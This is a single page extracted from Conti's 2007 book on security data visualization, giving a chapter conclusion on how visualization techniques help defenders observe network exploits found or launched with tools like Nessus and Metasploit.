Vulnerability Assessment and Exploitation 81

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Conclusions
Vulnerability assessment tools such as Nessus and easy-to-use exploitation
tools such as Metasploit have changed the landscape of network security.
Attackers of all skill levels can use these tools, in conjunction with port
scanners, to locate and compromise many networked computers. Current
techniques for visualization of network exploits, payloads, and subsequent
activity have not been perfected, but the parallel coordinate plot, combined
visualization, text rainfall, and binary rainfall constitute a powerful set of
tools to help us better understand how these attacks work and how to pro-
tect against them. Even if an attacker obfuscates the shellcode or encrypts
his follow-up activities, these visualization techniques will work with the
unencrypted header fields to allow you to observe key aspects of the
interaction.
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

82 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].